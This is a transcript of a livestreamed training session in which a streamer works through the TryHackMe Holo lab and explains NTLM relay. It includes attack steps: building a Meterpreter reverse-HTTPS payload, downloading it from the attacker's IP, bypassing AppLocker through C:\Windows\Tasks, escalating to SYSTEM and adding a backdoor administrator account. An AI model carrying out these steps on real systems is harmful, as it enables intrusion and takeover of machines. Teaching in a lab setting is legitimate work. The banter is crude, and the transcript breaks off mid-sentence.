Rilya and coming here into Linux Server 1, okay? And we are then proxying through Linux Server 1 to PC File Servo 1. Okay? Does that make sense? And this is PC File Servo 1. That's where we are right now. Now, a concern here is we do need to get system again. I am going to need system because I think I'm going to have to play with the Windows firewall, and I need local administrator rights. So we're going to go ahead and get a interpreter shell. There is no Windows Defender on this box, which I remember from a previous attempt. So I'm going to just get interpreter because, again, I'm trying to use tools that you guys are familiar with. In the real world, I would be using Cobalt Strike for what you're about to see. But interpreter is helpful because it lets us do local exploit suggester, basically. We do not have admin rights, so we can't get system, but there's a CVE that will give us local admin. Let's start MSFDB. Or start MSF console. Let's rename this pane to MSF. Okay. Just so I can remember which pane Metasploit is going to be in. And now we can do MSF Venom. This looks good. I think this is fine. Is that my local? I don't think that's my IP address. If config 10.50.134.50. 10.50.134.50. So we're going to generate a interpreter executable. The payload is going to be Windows interpreter reverse HTTPS. We are generating. There we go. Okay. So use exploit multi handler. I love this one. I like this. I like Metasploit's little like flavor. I like how this is like access secure. This is actually what Samuel L. Jackson types in during that scene, which is pretty cool. You didn't say the magic word? Yeah, so this is a Jurassic Park reference if you don't know. It's a reference from...
Say the magic word. Please! God damn it! Hate this hacker crap.
Calling it.
Jurassic Park, a classic hacker movie. And I was perturbed that on yesterday during the tournament or whatever, there was some silly questions like, what's the best hacker movie? And Jurassic Park wasn't even on there. What? Jurassic Park wasn't even fucking there. Like, do people not... It has hacking and dinosaurs. It's not Hackers. I will fight people on this. Hackers is not that great. Fight me. Yeah, honestly, I get it. Some people, you either love it or you hate it, okay? You either love Hackers or you hate it. I personally don't like that campy, overhyped, like, hacker sort of aesthetic. I've never really liked it. So if I had to say the best hacker movie, first of all, I said The Matrix. But it's either going to be The Matrix or War Games. It's either going to be The Matrix or War Games. I liked The Matrix and I liked War Games much more than I liked Hackers. Bash Bunny! My goodness, that is so kind of you, Bash Bunny. Thank you so much. I was lurking in your stream earlier today, but thank you so much. Welcome to all of your viewers. We are hacking right now. We are on the TryHackMe Holo network, and we're trying to get Metasploit going so that we can do a really cool exploit called NTLM Relay, which is going to help us completely compromise this machine, or completely compromise this network. It's gonna be exciting, and we got a little bit sidetracked talking about Jurassic Park and why it's amazing. All right, so set localhost. By the way, check out Bash Bunny if you haven't. Bash Bunny is a fantastic streamer. She typically does coding. Today she was doing Go for some reason, she typically does, learns how to code on stream. I highly recommend you check her out. Again, thank you so much, Bash Bunny, for the very kind stream. Localhost is going to be ton0, which is our Ethernet interface. Can I not set... Oh, set localhost. ton0. Show options. Set. Local port 8443 is fine. Oh, actually... No, that'll work. 8443 is fine. Run. Okay, so we have a listener running now. So now we need to pull this malicious executable onto the server. So we're gonna set up a HTTP server. We're gonna go to our RDP session and we're gonna go. Well, first we're gonna CD into desktop. And then we're going to wget http://10.50.134.50, I think it is. Cthulhu. Is it Cthulhu meter? Yeah. Meter.exe. There we go. Oh, I forgot to put output. Oh, not malicious.exe. They'll never guess. Okay, this is a classic technique. If you need to drop it on disk, the file name can't lie. Many people don't know this. The file name actually cannot lie. So if it says it's not malicious, you know it's good. You know it's fine. Apparently, code compiled in Golang is really easy to reverse engineer compared to other languages. It is. Golang handles things very differently, though. You need to know. You need to use a. If you just try to spin it up in Ghidra. I don't know if Ghidra handles Go compiled code very easily. But I think there are Go specific compilers out there. Go does things very strangely compared to other languages to compile them into operable executables. So you do need to, but if you use a proper decompiler, yeah, it's doable. So we have our notmalicious.exe. Let's go ahead and click that. Oh, rude. AppLocker is in. AppLocker is being rude, chat. Okay? This is what AppLocker is. AppLocker prevents people from just sort of arbitrarily executing random executables they download from places. Unfortunately, it has some simple bypasses. So by default, in AppLocker, everything in the C Windows directory is allowed. So everything inside of this directory and all subdirectories is allowed. So let's just open that up. Let's go in so you guys can see it easier. Windows. And a bunch of these directories in here are actually typically writable by low-privileged users. And one of them that I have the most success with is tasks. And you could see that apparently some other people are aware that of C Windows tasks. So we'll just so this time we notice we don't get an app locker pop-up. Our executable is running. Are we going to get a callback? Maybe I generated the executable incorrectly. Nope. There it goes. All right, we're getting our Meterpreter shell. Maticus Maximus bringing Infinite Logins into the fold. Welcome back, Infinite Logins. Always a pleasure to have you here, as always. We have tons of new follows. Mike Shudo, Zatara 9, Dr. Drool, Void Buff, Aloisa was taken on Nightly, Coder, Eternal Cold, and Primey, I think. Shine Slove, Skella Piao, Narco says Socratic Paradox, K Kashi, and Atlander. Thank you for the follows. Cthulhu fought to you, my friend. Zatara, great content, first time here. Great to see you here, Zatara. We are purely a offensive cybersecurity stream. So if you want to know how to hack, this is where we do some coding now and then, but it's usually coding like we're code malware and useful scripts for offensive cybersecurity operations. I'm a red teamer in real life, so I do this stuff for a living. So you see, we do have our nice, happy Meterpreter session. We can see what UID. We should be the Watamet user. Yep, we are the Watamet user here. And which exploit did we use that gave us a system shell? This one right here. Last time we ran local exploit suggester. But we found one that works. Set session 1. Yes, this looks good. Set localhost ton 0. Set local port 8444, I guess we can say. Show options. And we can run. Okay, so it's going to do some magic. Don't worry about this. Magic is happening, okay? Magic is happening, and we get dropped into another Meterpreter session, session 2. Get UID, and now we're NT Authority System, which is exactly where we want to be, because NT Authority System, MSF, yeah, sometimes MSF just works, okay? This is how good MSF is, okay? So sometimes MSF just works, okay? Would you ever do a collab stream with another streamer who doesn't know how to hack by teaching it? Absolutely. Absolutely, I would. I would love to do a stream where I take someone like Bash Bunny or any of those other coding streams, or Coding Garden or something like that. I would take them through a Hack the Box or a TryHackMe machine or Husky Hacks, Keck W. Narco says, I'm the friend. Yeah, I would do it. Yeah, I totally would. I would totally collab with another streamer and teach them a little bit of this stuff. It's cool stuff. It's cool stuff. Difficult to do. Spoken of in hushed tones like sorcery in the media, which is why we joke about Lovecraftian fiction here. But ultimately, it's a lot of simple tricks and nonsense, as my good friend Han Solo says. Beyond Twisted Meadows and Umaneki, thank you for the follow. Okay, so the first thing we're going to do is we're going to drop into a shell. I'm going to make myself a nice administrator user. Net user Alhazred Cthulhu 1 exclamation point add. My goodness, so many raids today. Gar with the raid as well. Thank you so much for the raid. Welcome to your viewers. I have so many things on my plate right now, but I'd love to do something like that over a longer period so there's actual learning progress. Oh, absolutely. I mean, just reach out to me if you'd like. Where you teach people how to press F12. I will teach people. It's illegal. I'm not going to teach people how to do illegal things on stream. Okay? It is. You can be prosecuted in some states in the union for pressing F12, as it turns out. So we're adding a new user to this machine, and we can see that this user is added if we come over here and go net user. We can see now there's this Alhazred user here that obviously wasn't there before. And we can also add him to the local administrators. Net local group administrators Alhazred add. Okay. Net local group remote desktop users. You usually have to be in the remote desktop users group in order for Windows to allow you to RDP in. Oh, it doesn't have that group. Does it not? Maybe I spelled it wrong. No, it's right here. Remote desk. Did I spell it wrong? No. Maybe I have to put it in quotes. Normally it doesn't require me to put it in quotes, but... Oh, quotes. There we go. Okay. Normally it doesn't require quotes, but apparently that time it did. Must be a Meterpreter, a little quirk of Meterpreter, perhaps. Okay, so now we can RDP in. So this RDP session is useless to us now. So we're going to go ahead and kill that. So let's go back to this, and instead let's RDP in with that new user account I just made because it has local administrator rights. And then we're going to talk about NTLM Relay. Now things really get sporting. And here we are. So we are now administrator, and we can prove that if we just go to, we can open up PowerShell. We don't want ISE. We just want regular PowerShell. Run as administrator. And there we go, administrator. So we now have full administrative rights here, which is what I need to do what I'm about to do. But before I do start playing around with this, I need to explain to you. We need to have a talk, chat. Okay, you guys ready to hear about NTLM? Do you want to know? Do you want to know how NTLM works? How Windows authentication works? I'm seeing Monka S's. Yes, absolutely. You should be Monka S'ing. Mostly at how embarrassingly bad this is. Well, it's not embarrassingly bad, okay, but it does have weaknesses. Nefarious010, thank you for the 3 months. Welcome back to the Alhazred team. All right, so we're gonna do a paint stream. Paint stream. So this is, we will say this one is Riley Reed for no reason in particular. Just like that name rolls off the tongue real nice. Okay? We're just going to call this one Riley Reed. And we're going to call this one... Elsa Jean. Again, no, don't Google those. Okay, these are names completely made up off the top of my head, and these are Windows hosts. These are Windows hosts, and not and not any other thing that you could be thinking. Okay, would you not want to grab the other creds on the machine? Absolutely, I would. Absolutely, I would. I think we already did that, and we found there wasn't anything. But yes, we would definitely run Mimikatz on this machine. We would definitely run Mimikatz on this machine. We may still do it just to be safe. Where is Paint? There you are. Okay. Who are these people? They're not even people, Dystopia. They're not even people. These are Windows hosts on an Active Directory network. It doesn't really have to be Active Directory, but they're Windows hosts on the same network. Okay? Let's say Riley Reed, for some reason, wants to talk to Elsa Jean. Okay? So Riley Reed wants to communicate with Elsa Jean, and we're going to use NTLM to talk. We're going to use NTLM to talk here. Okay? I'm just trying to make this an acceptable size. Okay, so here's basically how NTLM works. Here's how this communication is going to go. And I know there's going to be some people in chat who are going to be like, Mr. Streamer, it doesn't technically work that way. Okay, first of all, this is going to be a high level. We're not getting into a deep discussion of how NTLM, if the very specifics of how NTLM works, okay? The point of this discussion is to explain to you at a high level why NTLM relay works. It's not to explain, to give a comprehensive understanding of all the deep intricacies that have to do with this particular hole. We won't say a rabbit hole. It's a different kind of hole. Different kind of hole. You can extrapolate in your own head what kind of hole we're talking about. But we're gonna get in there real deep, okay? We're gonna get in there. We're not gonna get in there real deep. But you know what? We don't really need to penetrate all the way in to get the job done, okay? It turns out that most of the nerve endings are right there at the entrance. So, I don't know why I said nerve endings just now, but the point is we don't have to go that deep into it for you to cover the subject. That's the point I'm trying to get to, okay? Listen, okay? That's what we're trying... That's... Okay. Hopefully that makes sense. So, basically, Riley will send Elsa a message... saying something like, we can say something like, let's make this red. Henlo, auth, please. Okay? Alright. So far, so good, right? Riley is just reaching out to Elsa and saying, hey, I would like to authenticate to you, to perform, to establish a session. I would like to establish a session with... Yeah, consent. Excellent, Professor Dragmire. I like it. We're establishing consent. I love that. That's an excellent way to put it. Okay? So, Elsa is going... Black. Elsa prefers black. Okay? That, like, we know... we know this. Like, this went in a direction I didn't expect. But we know this because of reasons. Alright. Perhaps there's a video description. You can find many explanations on the internet of how NTLM works. So what Elsa is going to reply with is an encryption challenge. So this is where, if you hear people talking about the Windows challenge and response, this is what they're referring to, okay? So the reason NTLM works this way is because Windows is trying to avoid, Windows is, I should have called her relay read. Fuck. Damn it, damn it. Damn it. Okay, well, let's just pretend I did call it that, okay? Let's just pretend I did call it that. We can actually just go ahead and do that. Let's just erase that. There we go. That is superior. Good catch, Tiberius. I like that. Thank you very much. Citing my sources, that was Tiberius. This is about NTLM Relay? Yeah, this is about NTLM Relay. So, the thing about Windows is Windows really does not like to send password information over the wire. Okay, that includes password hashes. Windows is avoiding at all cost the idea of sending password hashes over a network where they can be intercepted and potentially decrypted. They do not want that. So instead, we've got NTLM, what's called the challenge and response mechanism. So Elsa is going to reply and say, hey, here's a timestamp of this communication with this, that's been encrypted with the password hash. Let me put this here so I can make it even clearer. Encryption challenge is a timestamp encrypted. Is it a timestamp? I need to look it up now. I know a timestamp plate. Let's just look it up. I don't want to give you guys faulty information because I can't remember exactly what it is. Don't you have like a... Okay. User shares their username and password and domain name. Develops a scrambled This is fucking... No. It's not... NTLM... challenge response... explained. Here we go. This looks good. Yeah, here we go. Okay, server response. So the client sends a logon request to the server. This is known as a type 1 message and contains a list of features supported by the client and requested of the server. That's this. That's the Henlo auth, please. Okay? Server refines which contains the agreed upon features and a random string, the challenge. Okay, so it's actually a random string, and the string has been encrypted with the string. Basically, it sends a random string, and the point and what. Okay, let me go back. I'm tongue-tying myself. It's not encrypted at all. Encryption challenge is a random. I thought it was a timestamp string for relay to encrypt with the user's password hash.
A hunter must hunt.
Okay?
Cthulhu Ftign.
Cheeto Bandito, thank you so much for the 13 months. Cthulhu fought into you indeed, my friend. Mick Carl R6 and Yagaitan, thank you for the follow. Okay, so again, a random string. Elsa knows what the random string is. Okay? Elsa knows what the random string is, and Elsa also knows the password hash of the user that Relay is trying to authenticate as. Relay also knows Relay's password. Okay? The reason is This random relay read then takes this random string and encrypts it using the user's password hash as a key. Just the password, not the password. The hash of the password. Does anybody see where I'm going by pointing that out? Relay read, in order to authenticate, relay read needs to respond to this encryption challenge with the random string that was given encrypted by the user's password hash. Does anybody see a flaw in that plan? Does anybody see a flaw already? How does Elsa know the password of relay read? The domain controller tells her. The domain controller is also involved in this, and I'm not telling you about the domain controller because it's confusing. Okay, I'll say it again. In order to pass this authentication challenge, relay read needs to respond
A hunter must hunt.
Hi senpai. Teach us the wicked ways XD. Also keep molding smile.
There has been no malding yet, although I think it's coming. It's going to be sporting to get this to work in the situations that exist in this lab without using Cobalt Strike. But we will get it to work, I promise. Okay. And then Elsa Jean, since she knows the password hash of relay read, again from the domain controller since they're in an Active Directory environment, Elsa Jean can then decrypt the string and see that it's the same string that she sent, and that's how Elsa Jean determines that relay read has the password, that relay read is who she says she is, and has the authentication password to authenticate to Elsa. Does that make sense? Again, authenticate please. Elsa Jean sends, hey, encrypt this string. Relay read encrypts the string with the password hash. And Elsa Jean grants access. Does anybody see any flaws already? I'm not talking about NTLM relay. We haven't gotten into what NTLM relay is yet. Just with the information that I've told you just now, are there any flaws that you can spy? Think about it. I'm gonna get some water. Uovan uomo hash collision. Close. Close. Think about that. Turco, you're real close. Yes, Tiberius. Tiberius gets it. As, you know, I know he knows what this is. Relay read does not actually need to know her password. She does not actually need to know the password in order to authenticate to Elsa. She just needs to know the hash. Let me say that again. All you need to authenticate to a machine through NTLM is the password hash. What do we call this? In penetration testing hacking terms, what do we call this? PTH, pass the hash. This is the origin of pass the hash. Does that make sense? Think about that for a second and get some water. Be right back. I'm learning more here than my CEH course. Of course you're going to learn more from me than CEH. CEH is dog shit, my dude. I'm still confused what Elsa is granting access to. You're not confused. You know what she's granting access to, Kaboom. Okay? Don't lie. Okay? Don't lie. You know. Goods and services. Okay. So, I saw some people mention Responder. Okay? Responder is capable of emulating this entire process. If Responder is going to pose as Elsa Jean, when we get a hash out of Responder, which part of this process are we seeing? In Responder, when we capture a hash in Responder, are we getting 1, 2, or 3? Elephant Pandas is correct. We're getting 3. It is number 3. Number 3 is the password hash being used to encrypt the, number 3 is the password hash. Essentially, the password hash has been used to encrypt a string. And since Responder is posing as Elsa Jean in that exchange, if Responder knows what string was passed to relay read. Okay? Responder knows what string, and then can simply brute force until they get an encryption output that produces that string. We call this an NTLM v2 hash. This is an or a net NTLM hash, because it's essentially the password hash kind of just salted. It's kind of a salted password hash. It's essentially a salted password hash, if that makes sense. I think it's literally like 1, 2, 3, 4, 5, 6, 7, 8, 9 if you look in the conf file. Yeah, I'm sure it's something easily predictable. But the point is, Responder knows. It doesn't matter what that string is. Responder just knows what it is and can therefore present you a hash that can then be decrypted, knowing what the string is. Does that make sense to everybody? Is everyone following the explanation so far? If you have questions, do ask, because it's only going to get more confusing from here. Because pass the hash is not the only weakness in this whole exchange. What encryption algorithm is used? I think it's DES. I believe it's triple DES. It's either DES or triple DES. I want to say it's DES. I want to say it's DES. I could be wrong. Don't quote me on that, Matthias. I'm not going to look it up for right now. I think it's DES. DES or triple DES, most likely. Who's trying to crack which user access? Oh, this is where we come in. This is where we come in. Okay? I was thinking about doing a gag here, but it's too much. I can't do that. I can't. So here we are. This is us, and we're going to call ourselves Kappa. Just for no reason at all. Okay? And we are also a machine on this network. Okay? It doesn't matter if we're a compromised machine or if we are a machine that's jacked it, that's a malicious machine that's connected to the network. It doesn't really matter. Point is, we are a machine on this network as well. And over here is our good friend, Relay Read. Okay? Basically, I'm just going to remake this same diagram over here, but I'm going to demonstrate to you. Okay, well, I fucked that up. Okay. All right. So, Riley Reid, same as before. Okay? Same as before. Riley Reid and Elsa Jean are trying to communicate over the network. Okay? But unfortunately... do I want to bring Responder into this? Okay, I'll bring Responder into it, but we're going to only explain at very high level. Okay? Responder allows us to pretend to be Elsa Jean. Like, let's imagine that Riley Reid and Elsa Jean are in separate rooms. Okay? They're in separate rooms, and Relay Reid is trying to send Elsa Jean a message, and she calls out, "Hi, is Elsa there?" And we reply with Elsa's voice. Okay? And we do it, and Elsa also replies, but we do it louder. Okay? Does that make sense? So Riley Reid thinks we are Elsa Jean. Okay? So Elsa's voice so singing. Why are people bringing up Frozen? This is not that Elsa. Okay, there are other Elsas. And one of them is this hypothetical Windows host that we want access to. Okay? There are other Elsa. Don't Google it. Okay? Don't Google it. So Riley Reid is gonna send our first NTLM message. Hello off, please. Okay? And then we want to authenticate to Elsa Jean as Relay Reid. We want to fool Elsa Jean into thinking we are Relay Reid and doing things on Relay Reid's behalf. Okay? So we're going to send a message to the real Elsa Jean. Saying, what are we going to say? What are we going to say, chat? What are we saying to the real Elsa Jean? Yeah. Hello off, please. We're saying hello off, please.
What are you doing, step bro?
Cheeto Bandito, I'm trying to explain NTLM Relay to you. By conveying to you a format that you understand. I assume that you understand it because I know your mom does. So stop complaining. Okay. So Relay Reid thinks that she's talking to Elsa, and Elsa thinks she's getting a message from Relay Reid.
What are you doing, step
Infinite logins just because... Did you not hear me just yell at Cheeto Bandito? Don't make me come in there. It will not be Elsa Jean. It will actually be me. You'll think it's Elsa Jean, but it's not. Okay? I'm pretending. You've been bamboozled. You don't want me to come in there. You want Elsa Jean to come in. So, how's Elsa Jean gonna respond? Help me out, chat. Participate in your learning. How is Elsa Jean gonna respond? Yeah, with a challenge. Remember up here, encryption challenge. Elsa prefers black. When it comes to arrows, when it comes to long filaments with a pointed tip at the end, Elsa definitely prefers black. Okay. Oh, okay. There we go. Listen, I've gone too deep now. I've got to commit. Okay, I've got to commit to it. Okay. So encryption challenge, and then we're just gonna send that back. Remember, Relay Read thinks that she's authenticating to Elsa right now, so she's expecting a relay challenge. Okay, so we're just gonna send that back to her. Encryption challenge. I could have done that better. That's fine. Whatever. Who cares? There we go. Okay, encryption challenge. And then how's Relay Read gonna respond? With the answer, right? And I've kind of like painted myself into a corner, so to speak. Okay, she's going to respond with the challenge answer. Which is the NTLM v2 hash. And then we're just going to send that hash. My diagram is... Let's just get rid of the encryption challenge, okay? Whatever. You guys understand, okay? This is paint. I'm limited. We're going to send the answer to Elsa Jean, and then how is this going to respond? How is this going to conclude? How does this conclude? What happens as a result of this entire exchange? Yeah. We now have access. We now have access to Elsa Jean's resources. As Relay Read. Elsa Jean thinks we're Relay Read. Relay Read thinks we're Elsa Jean. We have authenticated to Elsa Jean's resources. Does that make sense? What do we call this? Is this FTL? It is FTL. Music. What do we call this, chat? Well, person in the middle, yes. We call this a man in the middle attack. But what it's really called is NTLM relay. This is an NTLM relay attack. Does everybody understand what's happening here? Hacking Island! My goodness! So many raids today! Our villages are being burned down. Our women are being treated ethically and without any without any kind of mishandling by the raiders. And we're overrun with raiders today, chat. Hacking Island, thank you so much for the raid. Welcome to all of your viewers. I'm actually confused as to how the hash portion is what makes this vulnerable to man in the middle. What makes it vulnerable to man in the middle is that the messages do not contain any kind of signature or anything, so they can be modified in transit. That's what what the problem is, that the messages can be manipulated and modified in transit by somebody who manages to stick themselves between Relay Read and Elsa Jean. People getting it from raids. Listen, if anything, that's going to make you want to stay, okay? You're seeing there's lots of action happening on the stream here in Paint, okay? You're talking about NTLM. Yeah, NTLM relay. That's exactly what this is. We're about to demonstrate an NTLM relay attack, so I'm explaining how NTLM relay works. Pharma RL, thank you for the 5 months. I will keep Malding, thank you. Hacking Island again, thank you for the raid. Durden, please. Var GGY. Ketby, Wrist BS. UUID00. Dylan JC. Klaz, and Pickles166. Thank you all for the follows. Why wouldn't the attack work if NTLM would use the password instead of the hash? It would be worse. In that situation it would be worse. Because you'd be able to just it'd be easier to crack the password. The point is that NTLM relay goes out of its way to avoid sending passwords across the wire. But also doesn't want Windows to communicate with the user in any way other than password hashes. So as a result, NTLM only uses the password hash, and you don't need the password to authenticate. I know that was a little confusing. I'm being more confusing than I should be. The point is, you shouldn't use this. You should not use NTLM relay. What should you use instead? What could they have done to make it better? Invent Kerberos. And SMB signing. They did make it better, Professor Dragmeyer, with SMB signing. What is SMB signing? SMB signing is going to attach a signature to the end of each of these messages. So that Elsa Jean will be able to tell it's not Relay Read communicating with her, essentially. That's what SMB signing does. Okay? SMB signing in some cases can be bypassed. In some cases, SMB signing can indeed be bypassed.
What are you doing, Step?
Orbital gun, I am trying to explain this to you, Step Sis. Okay? What are you doing getting stuck in the washing machine again? This is the 3rd time this week. What's stopping someone from forging the SMB signatures? Because each one of the... I'm not going to go into how signatures are generated, but SMB signing is effective for the most part at preventing NTLM relay. SMB signing is enabled by default on domain controllers. Infamous Quiet, thank you so much for the... telling me to stop molding when I'm not even molding. I'm taking time out of my day to explain this to you. I've got your mom in the other room. I've got Star stealing my chicken. I don't have time to yell at you. Neither do I have time to yell at you, Reaper Grim. Your mom is waiting in the wings. Cerebro. I don't even know your mom, but I'm sure I can reach out. Oh my god, my throat's gonna go if I keep doing this. Let's do Stream Raiders really quickly before we continue. Did we make sure? Oh, thank you for reminding me. We had 14 minutes left, if anyone's curious. The high score for me forgetting to reset the box is, I think, around 14 seconds. Or like 37 seconds or something like that. Yeah, Husky, I'm going to go into the limitations of NTLM relay shortly. Because you actually kind of can relay back to the host, but not in the way you're thinking. Oh, this is the Rebel flagship, the final boss of FTL. God, the flagship is so hard unless you have the hacking thing. Sorovi with the most kills and most assists, just popping off in here. Should we get the gold or the... Let's get the tokens. Regarding Relay, when will Top Gun 2 be released? I don't know. Not soon enough, dude. I've been waiting for I feel like I've been waiting for Top Gun 2 since I was 10 or something. I need gold, don't we all, my dude? We could still get gold. We can just go up. Okay. So, again, some limitations of NTLM relay. In most situations, you cannot just relay back to the host. In the original version of this attack, you could just... Relay Read is trying to talk to Elsa Jean, and we just talk directly back to Relay Read. We just talk directly back to her. And we effectively... Relay Read effectively authenticates to herself. And that was effective because we know that Relay Read has the rights to access her own machine. So you've been waiting for Top Gun 2 for like 6 years? I think that's meant to be an insult, Narco says, but that just means I look young, so the joke is on you. You've complimented me. Thank you. Fucking Narco. Thinking he's coming in here insulting me. That is patched. That's been patched since like 2003. Or something. For a long ass time that's been patched. If SMB signing is enabled, generally speaking, you're not going to be able to relay. There are ways in some cases to bypass SMB signing, but in most cases, SMB signing is if SMB signing is enabled. Why would SMB signing not be enabled? I know you're thinking, well, if I'm a network administrator, I'm just going to enable SMB signing across the entire network, and then this attack doesn't work. That's you. That's you in chat. Why maybe do people just about never enable SMB signing? Yeah, it's fucking slow and it breaks shit. It's fucking slow as hell. It's gonna, like... You guys like it when you go to connect to a share drive or something and you get the little spinning wheel of death while it makes the connection? You guys enjoy that? Is that fun? Is that a good time? You guys enjoy that? Trying to get into the share drive and you get the spinning wheel of death every time? You're enjoying that? No, sir. No, sir. I have not seen a single network in my time that SMB signing has been completely enabled on. It is enabled by default on domain controllers. So, I know what you're thinking. Well, what if we just relay to the domain controller? The answer is that domain controllers by default do have SMB signing turned on. But other servers do not, by default, have SMB signing turned on. And you see there's this nice little server over here that I bet you doesn't have SMB signing turned on. And we can check. How would we check? How would we find out? If you wanted to know if a server had SMB signing turned on, how would you check, chat? I'll rephrase the question. If you want to do literally anything... if you want to exploit a Windows server in literally any way, what tool are you going to use? Crack map exec. Yeah, you guys fucking know. Crack map exec, okay? We're going to use crack map exec, okay? We have to proxy chains it, because we have to go through our SOCKS proxy. I appreciate that it's switched to the, let's see. That one is 3.2. Is there some connectivity issue? The network didn't die on me, did it? It's still running. Yeah, I'm still got a connection. Network's working. Or is it? Oh. Why is this taking forever? Huh. Can we not reach that server? Oh, no, it's the wrong IP. It's 137. 137. Huh. Are we still getting a timeout? I find Holo dies on me ahead of the timer? Well, I hope that's not the case. Can we connect to... Do we still have our RDP? We do still have our RDP session. Huh. We could reach 3-1. 3-5 is us. We are 3-5. Can we reach 30, which is the DC? Yeah. Why can we not... I thought they wanted me to relay. Like, all the other ones are working. It's not dead. I keep, like, checking the... Maybe we can Nmap scan it really quickly? I mean, it's got to have 445 open for us to... I don't think it's dead. Or at least it shouldn't be. Let's just take a look at the walkthrough and see what they want us to do here, because I do want to get this network done. I'm tired of fucking around with this. Okay. Did we do DLL? Did we do a DLL hijack here? Oh shit! Well, this is what you get when you don't follow the. Oh man, this is a good explanation of DLL hijacking. I'll be goddamned. Okay, well, maybe we should do the DLL hijack at some point. But we'll talk about that another time. Okay, so it's explaining NTLM to you. It's doing all that crap we just did. Okay. I did all of this without following the walkthrough. This whole box has a walkthrough. I've done it all without following the walkthrough. Now I'm trying to see what we're supposed to fucking do. It's telling me about responder, but I don't understand why it's telling me about responder because responder won't work. Nmap scan for SMB signings. What host has SMB signing disabled? I bet you it's this one. SRV02. But we can't access it. Okay, so it's not that server then. So which one? 01? Okay, how many letters is it at this point? 1, 2, 3, 4, 5, 6, 7, 8. It's not the DC, is it? Maybe it's just the DC. Maybe the DC... The DC has SMB signing enabled by default. So I don't even try DCs. 10.200.137.30. Wow. Okay, so you're just supposed to relay to the DC, which is that's very unusual. Okay, a lot of the times if I'm scanning a network and I see SMB signing turned on, I generally will assume that box is probably a DC. It looks like the DC again. The DC has SMB signing enabled by default, so the creator of the network had to have come in here and disabled it just for this attack. I'm interested to see how they want us to do this, actually, because it's going to be sporting. Does anybody see any problems with SMB relay in the situation that we're in? Okay, it's the DC. Okay, oh. I think I know what they want us to do. Okay, but we may just end up following this walkthrough, even though it's messy. I suspect, based on this title, that this is going to be messy as fuck. But I do want to have this done today. I'm tired of having Holo hanging over my hanging over my head here. Let's go back to Paint really quickly. So let's say we're a Windows machine. Let's say that Kappa is a Windows machine. Now remember, if we look back at our TryHackMe, we look back here. If we look back here, we are not a part of this network. We are none of these hosts. We're out here in fucking Never Land somewhere. Okay? And we've broken into this Docker container, then broke into this, then broke into this, then broke into this. Okay? But we're not a part of this network, and so we cannot situate ourselves to be in Kappa's position here, because we're not in their network. So instead, we need to perform the relay from probably this host. Okay, so we can do the relay from this host because we can remote desktop in. Does anybody see a problem with that? And if you don't see it, that's okay. If you don't see it, that's okay. It's not something that would be readily apparent to somebody who hasn't tried to do this shit in real life. We don't have a presence on the subnet, yes, but we do have a presence on the subnet. We're here. We're in this server, so we can use this server to relay between one of these other hosts, probably this one. I assume this one is the one that's authenticating, because we can't reach it. It's the only one we haven't touched. We can co-opt the communications between these two servers from here. The problem is SMB itself. So Windows basically always has SMB enabled. Basically, SMB is always on. It's always listening. What port does it listen on? What port are we talking about? 445. So if a communication comes in from 445, SMB is going to handle it. We're not going to be able, in most cases, to intercept that traffic. We cannot... SMB is going to get it for us. We want to intercept that traffic and send it somewhere else. But the problem is, SMB is listening at that port. So we have two options. What are our options? We can't listen on the same port as SMB. We need to do one of two things. Number one, we turn SMB off, which is what I assume this is doing. Why not just turn it off? I assume this is turning off SMB. Yeah. So the intended path here is to shut down SMB, is to kill SMB. That's messy. That's real fucking messy. You probably wouldn't do that on a real assessment. That would be icky. That'd be gross. Because not only do you have to kill SMB, which is like a foundational process to Windows communicating over the network, but you also have to reboot the machine to do that. I assume. Yeah, restart. So they have you reboot a machine. Not a good thing if you have to reboot a client's machine. It's not a good thing. Okay? How would you do it without shutting it down? We need to intercept that traffic before it gets to SMB and send it somewhere else. So if you remember at the beginning of the stream, I said we might be able to do it using manipulating the Windows firewall. What I was referring to was manipulating Windows firewall to, if a connection comes in through port 445, it gets redirected to a different port on which we can be listening with our on which we can listen with a different service to play with it. Does messy mean easily noticed? Easily noticed, causing them a denial of service on that machine. Real messy. It's gross. I don't like it at all. Unfortunately, we might end up doing that. So the normal way I would do this, Husky already mentioned it. But Rastamouse... our good friend Rasta Mouse has a blog post on NTLM relaying using Cobalt Strike. So what we do here is you see that he gives. I'll walk through this with you and how this is going to look. But essentially, we're going to use something called. This is NTLM Relay X. Where am I? Where is this? Right here. Port Bender. We're going to use a tool called Port Bender. I'll turn the music down. I'm sorry. StarCraft comes in a little bit more hot than FTL does. Is that better? Is that good? Okay, cool. So, this is also a little bit messy. We have to put this driver on the system. That's why he's uploading this driver. And then you use this this tool that's built to work in Cobalt Strike. To use this driver to basically intercept traffic coming into port 445 and send it somewhere else. This prevents you from having to shut down the SMB process. It does cause a momentary disruption in communications with that box, of course, because you're blocking SMB from being connected to. But this prevents you from having to shut down SMB entirely and prevents you from having to reboot the machine. I had some issues getting this to work in the labs. Yeah, this is going to be gross. Again, without Cobalt Strike to help me with this, I have done this in real life. This is a technique that I have used in real life, but I've done it with Cobalt Strike. And I'm not really comfortable not doing it with Cobalt Strike. So we may just go through the intended route here so I can show off how NTLM Relay works. It's going to be fucking sporting to do it without it. I would like to see it done. I know. Let me see. Let's tell you what. Let's look into seeing if we can do it with the Windows firewall. If we can get it to work, if I can get the Windows firewall to do what I need to do, I think I can, to forward the port, I think I can make it work without Cobalt Strike, okay? Meterpreter, we will need Meterpreter. I'll need Meterpreter's port forwarding capabilities to do it. We're going to need a port forward as well. So, we'll try to do it without the walkthrough, okay? I'm not going to do it with Cobalt Strike. I committed to not using Cobalt Strike on this thing. And I think my license is actually expired on this machine anyways. Because I haven't used Cobalt Strike on this machine for a while. Cobalt Strike is on my laptop, which is off to my left that you cannot see. Okay, so this is what it looks like. So this is relay read right here. Relay, port bender is C#? No, it is C++. It's built in C++. I think it's C++. It could be C. It's not C#. I know it's not C#. It's either C or C++. So we have, this is relay read right here. If you tie this to my wonderful, objectively better drawing, this is relay read and this is Elsa Jean. Okay? Is everyone following? Okay? So the relay read is going to connect with us. Relay read is going to connect with us over SMB. This is port 445. Port bender or the Windows firewall or however we would do it is going to redirect it to a different port. Any other port that Windows is not listening on would work. It's going to redirect it to a different port on here. Then that port is going to have a service listening, probably Meterpreter. We'll probably use Meterpreter's port forwarding capabilities to send this to our the team. Ignore the team server thing. This was built to work with Cobalt Strike. Assume that we are the team server, or assume that this team server is not here. Assume that this part. Remove this part from your brain. Okay. Remove this part from your brain. This part doesn't exist. We're relaying back to the we're relaying this communication back all the way back to a different port on the host, and then that different port is going to have a service listening Meterpreter that's going to send it to our Kali machine. This is our Kali machine, and our Kali machine is going to have 